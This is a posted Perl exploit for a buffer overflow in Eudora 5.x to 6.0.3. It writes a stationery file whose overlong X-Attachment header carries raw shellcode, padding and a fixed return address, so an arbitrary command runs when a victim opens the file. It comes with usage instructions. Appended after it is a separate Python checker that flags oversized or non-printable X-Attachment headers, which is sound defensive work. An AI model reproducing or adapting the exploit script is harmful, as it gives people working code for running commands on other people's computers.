Eudora versions 5.x to 6.0.3 local exploit

# Author:             LibX (libx@easydoesit.com)
# Date:               29-06-2004
# Exploit #:          1

# Program:            Eudora
# Tested on:          v5.1 / v6.0.1.1 / v6.0.22 / v6.0.3 All English (NT/2K/XP all service packs)
# Exploit Type:       Local Buffer overflow
# Shellcode:          Shellcode to execute a command
# Shellcode version:  v2.5 PRIVATE (GENERIC)
# How-to-use:         EudExploit.pl <command to execute> > <urfilename>.sta

The program code follows:
use strict;
use warnings;

# print usage and quit when no command was given on the command line
if (!defined $ARGV[0]) {
    print("Eudora v5.x to <6.1 attachment bufferoverflow exploit v2.5\n");
    print("Usage: EudExploit.pl <command to execute> > <urfilename>.sta\n\n");
    print("Sample: EudExploit.pl notepad.exe > TestShell.sta\n");
    exit;
}

# command execution shellcode; the command given on the command line is
# appended to it and terminated with \xFF
my $shellcode = "\xEB\x6D\x5F\xB9\x11\x11\x11\x11" .
                "\x89\xCB\xFC\xB0\xFF\xF2\xAE\x87" .
                "\xD9\x29\xD9\x81\xC7\x10\x11\x11" .
                "\x11\x81\xEF\x11\x11\x11\x11\xFE" .
                "\x07\x81\xC1\x10\x11\x11\x11\x81" .
                "\xE9\x11\x11\x11\x11\x29\xCF\x31" .
                "\xF6\x46\x56\x57\xBB\x66\x8B\x45" .
                "\x0C\xB9\x11\x11\x11\x11\xB8\x41" .
                "\x11\x11\x11\x2D\x32\x11\x11\x11" .
                "\x64\x8B\x40\x21\x8B\x40\x0C\x8B" .
                "\x70\x1C\xAD\x8B\x78\x08\x47\xB0" .
                "\x66\xF2\xAE\xEB\x01\x90\x4F\xFF" .
                "\x37\x5E\x39\xF3\x74\x02\xEB\xEE" .
                "\x8D\x47\xEA\xFF\xD0\xCD\x03\xE8" .
                "\x8E\xFF\xFF\xFF" . $ARGV[0] . "\xFF";

# filler: pad shellcode plus filler to 268 bytes so that $return lands on
# the saved return address
my $buffer = "A" x (268 - length($shellcode));

# EuLang.dll universal return address (625010E9: call edi)
my $return = "\xE9\x10\x50\x62";

# emit the message headers; the overlong X-Attachment value is the overflow
print("From: me\n");
print("To: you\n");
print("Subject: Eudora 5.x/<6.1 buffer overflow exploit\n");
print("X-Attachment: " . $shellcode . $buffer . $return . "\n\n");
http://hi.baidu.com/fengze
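A defensive check, added here and not part of the original post: it parses a message or stationery header block of the shape the script above emits and flags an X-Attachment value that exceeds the 268-byte layout the exploit relies on or that carries raw non-printable bytes. The header name and the 268 threshold come from the script; the sample inputs are constructed.

```python
# Added defensive check (not part of the original post): scan a header block for
# an X-Attachment value that is oversized or contains raw non-printable bytes.
import re

# Threshold taken from the script above, which pads shellcode + filler to
# 268 bytes before the overwritten return address.
MAX_ATTACHMENT_HEADER = 268


def parse_headers(raw: bytes) -> dict[bytes, bytes]:
    """Split the header block (up to the first blank line) into name -> value.

    Assumes simple one-line headers; folded continuation lines are not joined.
    """
    raw = raw.replace(b"\r\n", b"\n")
    head = raw.split(b"\n\n", 1)[0]
    headers = {}
    for line in head.split(b"\n"):
        if b":" not in line:
            continue
        name, value = line.split(b":", 1)
        headers[name.strip().lower()] = value.strip()
    return headers


def check_x_attachment(raw: bytes) -> list[str]:
    """Return a list of findings; an empty list means nothing suspicious."""
    findings = []
    value = parse_headers(raw).get(b"x-attachment")
    if value is None:
        return findings
    if len(value) > MAX_ATTACHMENT_HEADER:
        findings.append(
            f"X-Attachment length {len(value)} exceeds {MAX_ATTACHMENT_HEADER}"
        )
    # anything outside tab and printable ASCII has no place in a filename header
    if re.search(rb"[^\x09\x20-\x7e]", value):
        findings.append("X-Attachment contains non-printable bytes")
    return findings


# Constructed samples: a normal attachment header and an oversized one that
# starts with two raw opcode bytes followed by filler.
BENIGN = b"From: me\nTo: you\nSubject: hi\nX-Attachment: report.doc\n\nbody\n"
SUSPECT = b"From: me\nTo: you\nSubject: x\nX-Attachment: " + b"\xeb\x6d" + b"A" * 300 + b"\n\n"

if __name__ == "__main__":
    for label, sample in (("benign", BENIGN), ("suspect", SUSPECT)):
        print(label, check_x_attachment(sample) or ["clean"])
```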